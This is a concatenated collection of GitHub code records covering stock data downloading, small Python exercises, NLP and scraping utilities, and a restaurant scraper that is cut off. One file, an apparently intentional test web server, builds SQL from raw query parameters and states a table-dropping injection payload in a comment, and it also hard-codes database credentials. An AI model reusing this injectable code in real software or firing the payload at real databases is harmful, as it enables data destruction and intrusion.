# Get today's date\r\n today = pd.Timestamp.today()\r\n\r\n # Get the timestamp of today's beginning\r\n start_ts = int(today.replace(hour=0, minute=0, second=0, microsecond=0).timestamp())\r\n\r\n # Get the timestamp of today's end\r\n end_ts = int(today.replace(hour=23, minute=59, second=59, microsecond=999).timestamp())\r\n\r\n print(\"Start timestamp:\", start_ts)\r\n print(\"End timestamp:\", end_ts)\r\n return start_ts, end_ts\r\n\r\n\r\n# Define URL template\r\nURL = \"https://query1.finance.yahoo.com/v7/finance/download/{0}?period1={1}&period2={2}&interval=1d&events=history\"\r\n\r\nasync def download_stock_data(session: aiohttp.ClientSession, company_code: str, company_name: str, start_date: int, end_date: int) -> pd.DataFrame:\r\n \"\"\"\r\n Asynchronously downloads stock data for a given company_code between start and end dates.\r\n\r\n :param session: aiohttp.ClientSession object for making HTTP requests.\r\n :param company_code: Stock company_code.\r\n :param start_date: Start date as a timestamp.\r\n :param end_date: End date as a timestamp.\r\n :return: DataFrame with stock data.\r\n \"\"\"\r\n url = URL.format(company_code, start_date, end_date)\r\n try:\r\n async with session.get(url) as response:\r\n if response.status == 200:\r\n data = await response.text()\r\n df = pd.read_csv(io.StringIO(data))\r\n df['company_name'] = company_name\r\n df['company_code'] = company_code.split('.NS')[0]\r\n return df\r\n else:\r\n print(f\"Failed to download data for {company_code}. 
HTTP status: {response.status}\")\r\n return None\r\n except Exception as e:\r\n raise Exception(f\"An error occurred while downloading data for {company_code}: {e}\")\r\n\r\n\r\nasync def download_job(stocks_list: pd.DataFrame) -> pd.DataFrame:\r\n \"\"\"\r\n Main function to download stock data for multiple company_codes.\r\n\r\n :param stocks_list: DataFrame containing stock company_codes.\r\n :param start_date: Start date in 'YYYY-MM-DD' format.\r\n :param end_date: End date in 'YYYY-MM-DD' format.\r\n :return: DataFrame with combined stock data.\r\n \"\"\"\r\n # start_ts = int(pd.to_datetime(start_date).timestamp())\r\n # end_ts = int(pd.to_datetime(end_date).timestamp())\r\n\r\n start_ts, end_ts = get_timestamp_today()\r\n\r\n async with aiohttp.ClientSession() as session:\r\n tasks = [asyncio.create_task(download_stock_data(session, row['company_code'], row['company_name'], start_ts, end_ts)) for _, row in stocks_list.iterrows()]\r\n nifty_data_list = await asyncio.gather(*tasks)\r\n nifty_data_list = [item for item in nifty_data_list if item is not None]\r\n\r\n if len(nifty_data_list) == 0:\r\n raise Exception(\"There is no data\")\r\n \r\n nifty_data_df = pd.concat([item for item in nifty_data_list if item is not None], ignore_index=True, axis=0)\r\n nifty_data_df['Date'] = pd.to_datetime(nifty_data_df['Date'])\r\n nifty_data_df['year'] = nifty_data_df['Date'].dt.year\r\n nifty_data_df['month'] = nifty_data_df['Date'].dt.month\r\n nifty_data_df['day'] = nifty_data_df['Date'].dt.day\r\n\r\n return nifty_data_df\r\n\r\n# Example usage\r\n# stocks_list = pd.DataFrame({\r\n# 'company_code': ['ADANIPORTS.NS', 'BAJAJ-AUTO.NS'],\r\n# 'Company Name': ['Adani Ports', 'Bajaj Auto Ltd.']\r\n# })\r\n# start_date = '2023-01-01'\r\n# end_date = '2023-11-30'\r\n# loop = asyncio.get_event_loop()\r\n# nifty_data_df = loop.run_until_complete(main(stocks_list, start_date, end_date))\r\n","repo_name":"vaibhavmaurya/aimlops-iisc-grp2-jarvis-capstone","sub_path":"DataIngestion/src/Job.py","file_name":"Job.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10461906956","text":"year_born =str(1799)\r\nday_born = str(6)\r\n\r\nyear_input = \"\"\r\nwhile year_input != year_born:\r\n year_input = input(\"В каком году родился А.С. Пушкин? \")\r\n\r\nday_input = \"\"\r\nwhile day_input != day_born:\r\n day_input = input(\"В какой день родился? \")\r\n\r\nprint(\"Верно\")","repo_name":"sakovd/dz2","sub_path":"borndayforewer.py","file_name":"borndayforewer.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10255869007","text":"import http.server\r\nfrom urllib.parse import urlparse\r\nfrom urllib.parse import parse_qs\r\nimport os, sys\r\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\r\nimport socketserver\r\nimport pathlib\r\nimport mysql.connector\r\nimport traceback\r\n\r\nclass serverResponse(BaseHTTPRequestHandler):\r\n\r\n Error_Page = \"\\\r\n \\\r\n \\\r\n

<h1>Error accessing {path}</h1>\\\r\n        <p>{msg}</p>

\\\r\n \\\r\n \"\r\n mydb = \"\"\r\n \r\n sql_dynamic_content = [\".\", \".\"]\r\n \r\n try:\r\n mydb = mysql.connector.connect(host=\"localhost\", user=\"httpUser\", password=\"simpleP4ssPhrase4Testing\", database=\"htmlDB\")\r\n print(\"DB htmlDB connected\")\r\n except Exception as excep:\r\n mydb = mysql.connector.connect(host=\"localhost\", user=\"httpUser\", password=\"simpleP4ssPhrase4Testing\")\r\n dbcursor = mydb.cursor()\r\n dbcursor.execute(\"CREATE DATABASE htmlDB\")\r\n print(\"DB htmlDB created\")\r\n \r\n dbcursor = mydb.cursor(buffered=True)\r\n try:\r\n dbcursor.execute(\"CREATE TABLE htmlInput (id INT AUTO_INCREMENT PRIMARY KEY, input TEXT)\")\r\n print(\"Table htmlInput created\")\r\n except mysql.connector.errors.ProgrammingError as pe:\r\n print(\"Table probably already existed\")\r\n except Exception as excep:\r\n traceback.print_exc()\r\n \r\n def do_GET(self):\r\n try:\r\n \r\n currWorkingDir = os.path.abspath(os.getcwd())\r\n #print(\"workingDir: \", currWorkingDir)\r\n #print(self.path)\r\n full_path = os.path.join(currWorkingDir, self.path.replace(\"/\", \"\")) #.replace(\"/\", \"\\\\\")\r\n #print(full_path)\r\n url_comp = urlparse(self.path)\r\n query_comp = parse_qs(urlparse(self.path).query)\r\n \r\n # It doesn't exist...\r\n if not os.path.exists(full_path):\r\n #print(\"received: \", self.path)\r\n #print(\"url_comp: \", url_comp)\r\n #print(\"query_comp: \", query_comp)\r\n if url_comp.path == '/sqlinjection.html':\r\n self.handle_sqlInjection_page(query_comp) \r\n else:\r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"value.html\"), self.path)\r\n #raise Exception(\"'{0}' not found\".format(self.path))\r\n # ...it's a file...\r\n elif os.path.isfile(full_path):\r\n if url_comp.path == '/sqlinjection.html':\r\n self.handle_file(full_path, [\".\", \".\"])\r\n else:\r\n self.handle_file(full_path)\r\n # ...it's something we don't handle.\r\n else:\r\n if self.path == '/':\r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"index.html\"), self.path)\r\n else:\r\n raise Exception(\"Unknown object: \"+ full_path)\r\n\r\n # Handle errors.\r\n except Exception as msg:\r\n print(\"Error occured: \\n\", msg)\r\n traceback.print_exc()\r\n self.handle_error(msg)\r\n \r\n # Handle the input from page sqlinjection.html\r\n # Exploit input: '; drop table htmlInput; select * from htmlInput where input = '\r\n def handle_sqlInjection_page (self, query_comp):\r\n if 'sql_insert' in query_comp:\r\n sql = \"INSERT INTO htmlInput (input) VALUES (%s)\"\r\n val = (query_comp['sql_insert'][0],)\r\n self.dbcursor.execute(sql, val)\r\n self.mydb.commit()\r\n self.dbcursor.execute(\"SELECT * FROM htmlInput\")\r\n result = self.dbcursor.fetchall()\r\n self.sql_dynamic_content[0] = result\r\n self.sql_dynamic_content[1] = \".\"\r\n for res in result:\r\n print(\"Result insert: \", res)\r\n else:\r\n sql = \"select * from htmlInput where input = '\" + query_comp['sql'][0] + \"'\"\r\n print(\"Injection String: \", sql)\r\n results = self.dbcursor.execute(sql, multi=True)\r\n result = []\r\n for res in results:\r\n print(\"Executing command: \", res)\r\n if res.with_rows:\r\n result += self.dbcursor.fetchall()\r\n self.mydb.commit()\r\n self.sql_dynamic_content[0] = \".\"\r\n self.sql_dynamic_content[1] = result\r\n \r\n self.handle_file(os.path.join(os.path.abspath(os.getcwd()), \"sqlinjection.html\"), self.sql_dynamic_content)\r\n \r\n \r\n # Handle unknown objects.\r\n def handle_error(self, msg):\r\n content = self.Error_Page.format(path=self.path, 
msg=msg).encode(\"utf-8\")\r\n self.send_content(content, 404)\r\n\r\n # Send actual content.\r\n def send_content(self, content, status=200):\r\n self.send_response(status)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.send_header(\"Content-Length\", str(len(content)))\r\n self.end_headers()\r\n self.wfile.write(content)\r\n \r\n # Prepare content to be sent \r\n def handle_file(self, full_path, value=\".\"):\r\n try:\r\n with open(full_path, 'rb') as reader:\r\n content = reader.read()\r\n if not \".js\" in self.path:\r\n content = content.decode(\"utf-8\").format(*value)\r\n content = content.encode(\"utf-8\")\r\n self.send_content(content)\r\n except IOError as msg:\r\n msg = \"'{0}' cannot be read: {1}\".format(self.path, msg)\r\n self.handle_error(msg)\r\n \r\nif __name__ == \"__main__\": \r\n httpd = socketserver.TCPServer((\"\", 8000), serverResponse)\r\n print(\"Server started!\")\r\n print(\"serving at port:\", 8000)\r\n httpd.serve_forever()\r\n \r\n print(\"Server ende\")","repo_name":"SteNu5/ServerBenchmarkTest","sub_path":"ServerBenchmarkTest/httpServer.py","file_name":"httpServer.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14423445568","text":"def swap(s,n):\n # Провека исключения\n if n == 0:\n return ('the lord of the rings')\n # Преобразование в двоичную систему счисления\n n1, s1, n2, j = '', '', '', 0\n while n != 0:\n n1 += str(n % 2)\n n = n // 2\n n1 = n1[::-1]\n # Создание строки битов такого же размера, как и нашего текстового сообщения\n for i in range(len(s)):\n if s[i] != ' ' and (s[i] not in '!?.,@#$%^&*():;\"\"'):\n n2 += n1[(i - j) % (len(n1))] \n else:\n n2 += ' '\n j += 1 \n # Алгоритм изменения символов если соответствует \"1\"\n for i in range(len(s)):\n if n2[i] == ' ':\n s1 += s[i]\n elif n2[i] == '0':\n s1 += s[i]\n elif n2[i] == '1':\n if s[i] == s[i].upper():\n s1 += s[i].lower()\n else:\n s1 += s[i].upper()\n return(s1)\n","repo_name":"DenisRudakov0/Algorithm","sub_path":"2 Swap Case Using N.py","file_name":"2 Swap Case Using N.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17519339541","text":"class PipelineCommon:\n \"\"\"The common pipeline of several processors.\n \n The pipeline provides an ablity to specify its structure in a declarative way. It requires that all \n its processors are callable (implement __call__ method). The pipeline can contain processors, \n remote gRPC processors, or other pipelines. During processing the pipeline stores the results in a dictionary. If\n processor returns None, results are ommited.\n Args:\n processors(list or dict): A list or a dictionary ({ : }) that contains tripples: \n (, , ).\n Dictionary of output annotations should specify name/ordianl number of annotation in dictioanry/tuple \n returned from processor. This is needed for storing the result annotation in an internal dictionary.\n If name or number is ommited then result will not be stored in a piplene and will be dropped from further\n processing.\n name(str): The name of the pipeline. 
It is used for automatic pipeline naming in a gRPC server container.\n \n Examples:\n 1.\n PipelineCommon([(ProcessorTokenizerNltkEn(), ['text'], {0 : 'tokens'}),\n (ProcessorSentenceSplitter(), ['tokens'], {0 : 'sentences'}),\n (ProcessorPostaggerNltkEn(), ['tokens', 'sentences'], {0 : 'postag'}),\n (ProcessorLemmatizerNltkEn(), ['tokens', 'sentences', 'postag'], {0 : 'lemma'})])\n \n 2.\n PipelineCommon([(ProcessorRemote(host = 'some_host', port = 3333, pipeline_name = 'main'), \n ['text'], \n {'tokens' : 'tokens', \n 'sentences' : 'sentences',\n 'postags' : 'postags',\n 'morph' : 'morph'}),\n (ProcessorSyntaxNetRemote('some_host', 7777),\n ['tokens', 'sentences'],\n {'syntax_dep_tree' : 'syntax_dep_tree',\n 'morph' : 'morph'})])\n \n 3. \n PipelineCommon({'tokenizer' : (ProcessorTokenizerNltkEn(), \n ['text'], \n {0 : 'tokens'}),\n 'sentence_splitter' : (ProcessorSentenceSplitter(), \n ['tokens'], \n {0 : 'sentences'}),\n 'postagger' : (ProcessorPostaggerNltkEn(), \n ['tokens', 'sentences'], \n {0 : 'postag'}),\n 'lemmatizer' : (ProcessorLemmatizerNltkEn(), \n ['tokens', 'sentences', 'postag'], \n {0 : 'lemma'})}, \n name = 'main')\n \n 4. \n PipelineCommon([(ProcessorTokenizerNltkEn(), ['text'], {'tokens' : 'tokens'}),\n (ProcessorSentenceSplitter(), ['tokens'], {'sentences' : 'sentences'}),\n (ProcessorPostaggerNltkEn(), ['sentences'], {'postag' : 'postag'}),\n (WrapperMultiProcessSentence([ProcessorPostaggerNltkEn() for i in range(4)]), \n ['sentences'], {'postag' : 'postag'}),\n (WrapperMultiProcessSentence([ProcessorLemmatizerNltkEn() for i in range(4)]), \n ['sentences', 'postag'], {'lemma' : 'lemma'}),\n (ProcessorSyntaxNetRemote('some_host', 8555), ['sentences'], \n {'morph' : 'morph', 'syn_dep_tree' : 'syn_dep_tree'})])\n \"\"\"\n \n def __init__(self, processors, name = 'main'):\n self._name = name\n if type(processors) is dict:\n self._processors = processors\n else:\n self._processors = {str(i) : processors[i] for i in range(len(processors))}\n \n def __call__(self, *input_data): \n result = {e : inp for (e, inp) in zip(list(self._processors.values())[0][1], input_data)}\n \n for proc, proc_input, proc_output in list(self._processors.values()):\n results = proc(*[result[e] for e in proc_input])\n if type(results) is tuple:\n results = {i : results[i] for i in range(len(results))}\n elif type(results) is not dict:\n results = {0 : results}\n \n result.update({ppl_label : results[proc_label] \n for (proc_label, ppl_label) in proc_output.items() \n if ppl_label})\n \n keys_to_delete = [k for (k,v) in result.items() if v is None]\n for k in keys_to_delete:\n del result[k]\n \n return result\n\n def get_processors(self):\n return self._processors\n\n def processors_iter(self):\n for proc_stuff in self._processors.values():\n proc = proc_stuff[0]\n if hasattr(proc, 'processors_iter'):\n yield from proc.processors_iter()\n else:\n yield proc\n","repo_name":"IINemo/isanlp","sub_path":"src/isanlp/pipeline_common.py","file_name":"pipeline_common.py","file_ext":"py","file_size_in_byte":5334,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"67"} +{"seq_id":"23770299676","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\n\r\n\r\ndef get_df_RSS():\r\n feeds = ['https://smartliquidity.info/feed/', 'https://finance.yahoo.com/news/rssindex',\r\n 'https://blog.buyucoin.com/feed/', 'https://cointelegraph.com/rss/tag/altcoin',\r\n 'https://cryptopotato.com/feed/', 
'https://cointelegraph.com/rss/category/top-10-cryptocurrencies',\r\n 'https://cointelegraph.com/rss/tag/regulation', 'https://cointelegraph.com/rss',\r\n 'https://www.coindesk.com/arc/outboundfeeds/rss/?outputType=xml',\r\n 'https://u.today/rss', 'https://coinpedia.org/feed/']\r\n output = []\r\n\r\n for url in feeds:\r\n resp = requests.get(url)\r\n soup = BeautifulSoup(resp.text, 'xml')\r\n\r\n for entry in soup.find_all('item'):\r\n item = {'Title': entry.find('title').text, 'Link': entry.find('link').text}\r\n output.append(item)\r\n\r\n df = pd.DataFrame(output)\r\n print(df)\r\n return df\r\n","repo_name":"ArtemiyM1/crypto_forecast_system","sub_path":"RSS_feed.py","file_name":"RSS_feed.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10043530","text":"#!/usr/bin/env python\n\nimport argparse\nimport re\nimport sys\n\n\ndef polish_monocharacters(text):\n phase1 = re.sub(r\"\\b([iwzoua]) (\\w|\\(|\\\\)\", r\"\\1~\\2\", text, flags=re.IGNORECASE)\n phase2 = re.sub(r\"~([iwzoua]) (\\w|\\(|\\\\)\", r\"~\\1~\\2\", phase1)\n return phase2\n\n\ndef _main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"files\", nargs=\"*\")\n parser.add_argument(\"--inplace\", \"-w\", action=\"store_true\")\n parser.add_argument(\n \"--nbsp\", \"-s\", action=\"store_true\", help=\"use Unicode A0, not ~\"\n )\n args = parser.parse_args()\n\n if not args.files:\n data = sys.stdin.read()\n result = polish_monocharacters(data)\n sys.stdout.write(result)\n\n for filename in args.files:\n with open(filename) as f:\n data = f.read()\n\n result = polish_monocharacters(data)\n\n if args.nbsp:\n result = result.replace('~', '\\xA0')\n\n if args.inplace:\n with open(filename, \"w\") as f:\n f.write(result)\n else:\n sys.stdout.write(result)\n\n\nif __name__ == \"__main__\":\n _main()\n","repo_name":"tgandor/meats","sub_path":"DTP/polish_monocharacters.py","file_name":"polish_monocharacters.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"33200632737","text":"\n\nn ,m = map(int,(input().split()))\ncards={}\ncardsL=[]\nans={}\nfor i in range(n):\n card=input()\n cards[card]=i\n cardsL.append(card)\n\ndef getCard3(A,B,m):\n card3=\"\"\n for i in range(m):\n if A[i]==B[i]:\n card3+=A[i]\n elif A[i]!=\"T\" and B[i]!=\"T\":\n card3+=\"T\"\n elif A[i]!=\"E\" and B[i]!=\"E\":\n card3+=\"E\"\n elif A[i]!=\"S\" and B[i]!=\"S\":\n card3+=\"S\"\n return card3\nres=0\nfor i in range(n-1):\n for j in range(i+1,n-1):\n CardT=getCard3(cardsL[i],cardsL[j],m)\n temp=cards.get(CardT,0)\n if temp>j:\n res+=1 \nprint(res)\n\n\n\n","repo_name":"marcus-aurelianus/codeforce","sub_path":"Round612/hyperset.py","file_name":"hyperset.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"43727425816","text":"from os import path\nimport numpy as np\n\n\nclass Oracle:\n def __init__(self, work_dir: str):\n self.work_dir = work_dir\n self.states = []\n self.rewards = []\n\n def load_history(self, file_name: str):\n with open(path.join(self.work_dir, file_name)) as f:\n lines = f.readlines()\n for line in lines:\n line = line.strip().split(',')\n start_state = [float(s) for s in np.array(line[:-1])]\n reward = int(line[-1])\n self.states.append(start_state)\n self.rewards.append(reward)\n\n def total_reward(self) -> int:\n 
return sum(self.rewards)\n\n def get_reward(self, state: np.ndarray) -> float:\n i = self.states.index(state)\n return self.rewards[i]\n\n def avg_reward(self) -> float:\n return self.total_reward() / len(self.states)\n\n\n\nif __name__ == '__main__':\n work_dir = '/Users/ironchefnate/iCloud/Documents/USC/CSCI_699_HRI/project/code/robolog/boost/oracles/sarsa/agent-00'\n history = 'state_rewards.csv'\n O = Oracle(work_dir)\n O.load_history(history)\n print(O.total_reward())\n print(O.states[0])\n","repo_name":"natesands/boosted-RL","sub_path":"forest/oracle.py","file_name":"oracle.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73239996372","text":"class Solution:\n def accountsMerge(self, accounts: List[List[str]]) -> List[List[str]]:\n\n father ={}\n rootmailToName = {}\n merge_MailList = collections.defaultdict(list)\n result = []\n\n def find(x):\n if x != father[x]:\n father[x] = find(father[x])\n x = father[x]\n return x\n\n def union(x1, x2):\n root1 = find(x1)\n root2 = find(x2)\n if root1 != root2:\n if root1 > root2:\n father[root1] = root2\n elif root1 < root2:\n father[root2] = root1\n\n # Build relations of all the mail\n for account in accounts:\n # creat first mail\n lead_mail = account[1]\n if lead_mail not in father:\n father[lead_mail] = lead_mail\n\n for mail in account[2:]:\n if mail not in father:\n father[mail] = mail\n union(lead_mail, mail)\n\n # connect root mail and name\n for account in accounts:\n name = account[0]\n rootmail = find(account[1])\n if rootmail not in rootmailToName:\n rootmailToName[rootmail] = name\n\n # merge the same root mails into a group\n for mail in father:\n rootmail = find(mail)\n merge_MailList[rootmail].append(mail)\n\n # connect name and mailing group\n for rootmail in rootmailToName:\n step_result = []\n name = rootmailToName[rootmail]\n step_result.append(name)\n step_result.extend(sorted(merge_MailList[rootmail]))\n\n result.append(step_result)\n \n return result\n","repo_name":"Tomatolism/Leetcode","sub_path":"Python/0721AccountsMerge/0721AccountsMerge.py","file_name":"0721AccountsMerge.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8250740174","text":"import torch\nimport torch.nn as nn\nimport torch.utils.data\n\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import accuracy_score, f1_score, confusion_matrix\n\nfrom data import NLPDataset, pad_collate, embedding_matrix\n\n# paths to datasets\nTRAIN_PATH = 'data/sst_train_raw.csv'\nVALID_PATH = 'data/sst_valid_raw.csv'\nTEST_PATH = 'data/sst_test_raw.csv'\nEMB_PATH = 'data/sst_glove_6b_300d.txt'\n\n\ndef prepare_data(batch_sizes=(10, 32, 32), freeze=True):\n \"\"\"\n Prepares SST data.\n\n :param batch_sizes: the batch sizes for train, valid, and test sets\n :param freeze: the embeddings won't be updated during training if True\n :return: train, valid, and test DataLoaders; and the embeddings\n \"\"\"\n train_dataset = NLPDataset.from_csv(TRAIN_PATH)\n text_vocab, label_vocab = train_dataset.text_vocab, train_dataset.label_vocab\n embeddings = embedding_matrix(text_vocab, 300, freeze, EMB_PATH)\n\n train_dataloader = torch.utils.data.DataLoader(\n dataset=train_dataset, batch_size=batch_sizes[0],\n shuffle=True, collate_fn=pad_collate)\n valid_dataloader = torch.utils.data.DataLoader(\n dataset=NLPDataset.from_csv(VALID_PATH, text_vocab, label_vocab),\n 
batch_size=batch_sizes[1], shuffle=True, collate_fn=pad_collate)\n test_dataloader = torch.utils.data.DataLoader(\n dataset=NLPDataset.from_csv(TEST_PATH, text_vocab, label_vocab),\n batch_size=batch_sizes[2], shuffle=True, collate_fn=pad_collate)\n\n return train_dataloader, valid_dataloader, test_dataloader, embeddings\n\n\ndef train(dataloader, model, loss_fn, optimizer, clip=None):\n \"\"\"Performs one train loop iteration.\"\"\"\n size = len(dataloader.dataset)\n total_loss = 0\n\n for batch_num, (X, y, _) in enumerate(dataloader):\n # compute prediction and loss\n output = model(X)\n loss = loss_fn(torch.squeeze(output), y)\n total_loss += loss\n\n # backpropagation\n optimizer.zero_grad()\n loss.backward()\n # gradient clipping (optional)\n if clip:\n nn.utils.clip_grad_norm_(model.parameters(), clip)\n optimizer.step()\n\n if batch_num % 100 == 0:\n loss, current = loss.item(), batch_num * X.shape[1]\n print(f'loss: {loss:>7f} [{current:>5d}/{size:>5d}]')\n\n return total_loss / size\n\n\ndef evaluate(dataloader, model, loss_fn):\n \"\"\"Performs one test loop iteration.\"\"\"\n y_true, y_pred = [], []\n loss = 0\n\n with torch.no_grad():\n for X, y, _ in dataloader:\n output = torch.squeeze(model(X))\n loss += loss_fn(output, y).item()\n\n pred = torch.sigmoid(output).round()\n y_true.extend(y.detach().cpu().numpy())\n y_pred.extend(pred.detach().cpu().numpy())\n\n loss /= len(dataloader.dataset)\n acc = accuracy_score(y_true, y_pred)\n\n print(f'Accuracy: {(100 * acc):>0.1f}%\\n'\n f'F1 score: {f1_score(y_true, y_pred):>8f}\\n'\n f'Avg loss: {loss:>8f}\\n'\n f'Confusion matrix:\\n{confusion_matrix(y_true, y_pred)}\\n')\n\n return loss, acc\n\n\ndef plot_performance(train_losses, valid_losses, valid_accs, epochs):\n \"\"\"\n Plots validation set loss and accuracy per epoch.\n\n :param train_losses: the training set losses per epoch\n :param valid_losses: the validation set losses per epoch\n :param valid_accs: the validation set accuracies per epoch\n :param epochs: the number of epochs\n \"\"\"\n fig, (ax1, ax2) = plt.subplots(1, 2)\n fig.subplots_adjust(wspace=0.4)\n\n ax1.plot(range(1, epochs + 1), train_losses, label='train')\n ax1.plot(range(1, epochs + 1), valid_losses, label='valid')\n ax1.set_title('train and valid loss per epoch')\n ax1.set_ylabel('loss')\n ax1.set_xlabel('epoch')\n ax1.legend()\n\n ax2.plot(range(1, epochs + 1), valid_accs, label='valid')\n ax2.set_title('valid accuracy per epoch')\n ax2.set_ylabel('accuracy')\n ax2.set_xlabel('epoch')\n\n plt.show()\n\n\ndef main(model, optimizer, train_dataloader, valid_dataloader,\n test_dataloader, epochs=5, clip=None):\n \"\"\"\n Performs SST sentiment analysis using the given model.\n\n :param model: the model for sentiment analysis\n :param optimizer: the optimizer to use\n :param train_dataloader: training set DataLoader\n :param valid_dataloader: training set DataLoader\n :param test_dataloader: training set DataLoader\n :param epochs: the number of epochs\n :param clip: max gradient norm for gradient clipping\n \"\"\"\n loss_fn = nn.BCEWithLogitsLoss()\n train_losses, valid_losses, valid_accs = [], [], []\n\n for epoch in range(epochs):\n print(f'Epoch {epoch}\\n-------------------------------')\n loss = train(train_dataloader, model, loss_fn, optimizer, clip)\n train_losses.append(loss)\n\n print('Validation set performance')\n loss, acc = evaluate(valid_dataloader, model, loss_fn)\n valid_losses.append(loss)\n valid_accs.append(acc)\n\n plot_performance(train_losses, valid_losses, valid_accs, epochs)\n\n 
print(f'Test set performance\\n-------------------------------')\n evaluate(test_dataloader, model, loss_fn)\n","repo_name":"yetra/dl-fer-20-21","sub_path":"lab03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38418990643","text":"from DemoDog import views\nfrom django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'DemoDog.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n#enter_article\n url(r'^$', views.index),\n url(r'^enter_article', views.enter_article),\n url(r'^accounts/login', views.login),\n url(r'^accounts/logout', views.logout),\n url(r'^accounts/auth', views.authfunc),\n url(r'^accounts/logged_in', views.logged_in),\n url(r'^accounts/invalid', views.invalid_login),\n url(r'^admin/', include(admin.site.urls)),\n)\n","repo_name":"knitinr/DemoDog","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38715474372","text":"\"\"\"\nProblem:\n\nYou are the technical director of WSPT radio, serving listeners nationwide. For\nsimplicity's sake we can consider each listener to live along a horizontal line\nstretching from 0 (west) to 1000 (east).\n\nGiven a list of N listeners, and a list of M radio towers, each placed at various\nlocations along this line, determine what the minimum broadcast range would have to be\nin order for each listener's home to be covered.\n\nFor example, suppose listeners = [1, 5, 11, 20], and towers = [4, 8, 15]. In this case\nthe minimum range would be 5, since that would be required for the tower at position 15\nto reach the listener at position 20.\n\"\"\"\n\nfrom sys import maxsize\nfrom typing import List\n\n\ndef get_min_range(listeners: List[int], towers: List[int]) -> int:\n # distance map storing the distance of listener from the nearest tower\n listeners_distance = {listener: maxsize for listener in listeners}\n for listener in listeners:\n for tower in towers:\n listeners_distance[listener] = min(\n listeners_distance[listener], abs(tower - listener)\n )\n return max(listeners_distance.values())\n\n\nif __name__ == \"__main__\":\n print(get_min_range([1, 5, 11, 20], [4, 8, 15]))\n\n\n\"\"\"\nSPECS:\n\nTIME COMPLEXITY: O(listeners x towers)\nSPACE COMPLEXITY: O(listeners)\n\"\"\"\n","repo_name":"ruppysuppy/Daily-Coding-Problem-Solutions","sub_path":"Solutions/314.py","file_name":"314.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":444,"dataset":"github-code","pt":"67"} +{"seq_id":"39770118389","text":"def add(matrixA, matrixB):\n result = []\n for i in range(len(matrixA)):\n row = []\n for j in range(len(matrixA[0])):\n row.append(matrixA[i][j] + matrixB[i][j])\n result.append(row)\n return result\n\ndef subtract(matrixA, matrixB):\n r = range(len(matrixA))\n result = matrixA.copy()\n for i in r:\n for j in r:\n result[i][j] -= matrixB[i][j]\n return result\n \na = [\n [2, 3], \n [4, 5]\n ]\nb = [\n [4, 6],\n [8, 2]\n ]\n\ndef getColumn(matrix, i):\n column = []\n for j in range(len(matrix)):\n column.append(matrix[j][i])\n\n return column\n\nprint('A + B = ', add(a, b))\nprint('A - B = ', subtract(a, 
b))","repo_name":"rxona/pbo-quiz-3","sub_path":"q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15872110042","text":"from __future__ import absolute_import\nfrom apartment import *\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nimport urllib.parse\nimport logging\n\nclass Restaurant(scrapy.Spider):\n name = 'tenedor'\n allowed_domains = ['www.eltenedor.es']\n start_urls = ['https://www.eltenedor.es/']\n logging.getLogger('scrapy').propagate = False # No mostrar log de scrapy\n\n def setData(self, pApartamento = Apartment):\n self.__apartamento = pApartamento\n \n self.__strUrl = 'https://www.eltenedor.es/busqueda/?searchText=' + self.__apartamento.nombreCiudad() + ', ' + self.__apartamento.nombrePais() + '&locality=' + self.__apartamento.nombreCiudad() + '&coordinate=' + self.__apartamento.latitud() + ',' + self.__apartamento.longitud()\n #self.__strUrl = urllib.parse.quote(self.__strUrl)\n self.start_urls.append(self.__strUrl)\n \n def empieza(self):\n process = CrawlerProcess({\n 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',\n 'DOWNLOAD_DELAY': 0.25,\n 'COOKIES_ENABLED': 'False'\n })\n\n #process = CrawlerProcess({\n # 'USER_AGENT': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36',\n # 'DOWNLOAD_DELAY': 0.25,\n # 'COOKIES_ENABLED': 'False'\n #})\n\n process.crawl(Restaurant)\n process.start()\n \n def 